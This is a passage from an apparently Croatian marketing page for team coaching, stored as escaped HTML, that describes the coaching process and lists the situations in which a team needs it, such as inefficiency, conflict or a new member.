Svrha je napraviti plan i dogovoriti realizaciju faza i koraka coaching procesa, definirati cilj i kako \u0107emo mjeriti rezultate procesa.<\/p>\n<p>Proces timskog coachinga kreira se na temelju speci\ufb01\u010dnih potreba timova i organizacija te po potrebi uklju\u010duje coaching, edukaciju, treninge i facilitiranje razli\u010ditih timskih procesa.<\/p>\n<p>Kada je timski coaching potreban :<\/p>\n<ul>\n<li>TIM nije dovoljno e\ufb01kasan<\/li>\n<li>U TIM-u postoje vidljivi i nevidljivi kon\ufb02ikti<\/li>\n<li>Formirate novi TIM<\/li>\n<li>TIM je dobio novog \u010dlana<\/li>\n<li>TIM prelazi na novi zadatak<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>Timski coaching je u\u010dinkovit pristup koji \u0107e izvu\u0107i ono najbolje od svakog \u010dlana, istovremeno transformiraju\u0107i njihovo radno iskustvo i \u017eivot. Tom transformacijom mijenja se i produktivnost i radna kultura.<\/p>\n<p>Prema jednoj od de\ufb01nicija, uspje\u0161ne organizacije od top menad\u017ementa do najni\u017eih pozicija, gledaju i kre\u0107u se u istom smjeru.
